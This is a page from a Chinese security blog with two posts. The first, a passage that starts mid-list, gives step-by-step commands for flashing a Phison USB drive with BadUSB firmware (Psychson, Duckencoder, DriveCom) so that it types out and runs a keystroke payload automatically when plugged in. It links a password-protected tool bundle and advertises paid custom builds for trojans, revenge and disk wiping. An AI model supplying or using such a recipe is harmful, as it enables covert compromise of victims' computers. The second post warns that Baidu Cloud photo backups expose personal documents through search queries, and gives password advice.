U盘 :东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0 主控版本:Phison 2251-03 购买地址: http://item.jd.com/929732.html

2、软件 

Windows x64主机 

(1)Java Runtime Environment :Java环境,用于支持Duckencoder 

(2)SDCC :刷写U盘的环境,用于支持Psychson 

(3)Visual Studio 2012 :编译Psychson的开发环境 

(4)Psychson :BasUSB写入工具 (https://github.com/adamcaudill/Psychson)

(5)Burner File :BN03V104M.BIN,必要的burner 

(6)USB-Rubber-Ducky Payload :编写Payload的参考代码 (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)

(7)Duckencoder :用于编译Payload 

(8)chipgenius 芯片检测工具 :用于确定U盘型号 

0x03操作流程 

1、配置Payload 

进入DuckEncoder文件夹 

执行:

java -jar encoder.jar -i payload.txt -o inject.bin

说明: 

encoder.jar:文件夹自带 
payload.txt:可参考USB-Rubber-Ducky Payload 
inject.bin:执行代码后生成的文件 

2、生成固件 

执行:

Psychson-master\firmware\build.bat

生成fw.bin文件 

3、将Payload写入fw.bin文件 

执行:

EmbedPayload.exe inject.bin fw.bin

说明: 

EmbedPayload.exe:编译EmbedPayload工程得来 
inject.bin:操作1生成 
fw.bin:操作2生成 

4、将生成的固件写入U盘 

(1)执行

DriveCom.exe /drive=E /action=SetBootMode

设置U盘模式 

(2)执行

DriveCom.exe /drive=E /action=SendExecutable /burner=BN03V104M.BIN

操作burner 

(3)执行

DriveCom.exe /drive=E /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin

将fw.bin刷入U盘 

0x04 小结 

刷入成功后,下次插入U盘会模拟键盘操作,自动执行Payload 

0x05 补充 

如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新 

相关工具以及国外的工具资料包请在这里下载:00.png

链接: http://pan.baidu.com/s/1jIm22bk 密码: mrxn

欢迎私聊博主个人定制哦!价格实惠,保你满意,远控女神?试卷?老师的秘密?报复?格盘?改后缀?木马?都可以!哈哈

我只负责制作,怎么用那是你的事儿!你也可以自己按照教程制作,喜欢折腾的慢慢折腾去吧!



admin 发布于  2016-4-1 13:34 

百度云这是变相的泄漏了用户隐私么? 业界新闻

手机安装过百度云的应该知道,安装完百度云后,首次打开百度云会自动把照片备份选择上,如果你没注意,直接就下一步了的话,就有点泄漏你的照片的危险,通过Google搜索,"site:yun.baidu.com 来自:iPhone" 会搜索出很多的手机照片:QQ截图20160331163006.png

博主初略的搜索了一下,来自iPhone 的结果有两千多。。。而且随便从这些照片中就找到了很多私人信息啊,比如:

寝室帅哥的销魂照:

QQ截图20160331162917.png

你的火车票,姓名,身份证号码,身份证自拍照,银行卡,家人照片,手机录制的视屏 等等(当然 全部打码 -_- ||我是好孩子):

QQ截图20160331162847.pngQQ截图20160331163057.pngQQ截图20160331163151.png

很容易的有意识的社工你,你的什么账号密码,或者是被冒用,被拿去实名注册等等,数不胜数啊,当然损失的就是这些百度云用户了,

博主提醒各位啊,在这个大数据时代,能不留网上的信息最好别留网上,因为谁也不知道那一天你用的服商会不会被黑,数据泄漏,谁也不敢打包票说不泄漏啊。。。最好的就是特别重要的还是自己放在本地,如果实在需要放在网盘等等,请加密压缩后在放上去,这样相对来说安全些,即使别人拿到了,也需要解密,对一般人来说就拜拜了,但是对于一些专业人士/团伙来说,密码太简单和没有没啥区别,挂上几百G的彩虹表,挖不了几天就出来了。。。要设置密码就把密码强度设置大点,包括大小写,数字特殊符号等都包括,而且长度最好是达到软件所能达到的最大长度,密码强度足够强大的情况下,理论上是可以被破解的,但是时间会长很多,几乎等于零(至少目前是,不知道以后会不会有什么新技术,可以破)。哎呀,不知不觉就说了这么多,只是希望在这个互联网大染缸里活动,时刻都要小心啊。人心太复杂,社会其实很简单。

大家也可以看看这几篇文章,或许会对你有帮助:

google黑客使用方法,让你见识不一样的世界

从12306信息泄露了解何为黑客撞库拖库洗库

江湖险恶 如何设置安全又方便的个人密码



admin 发布于  2016-3-31 16:27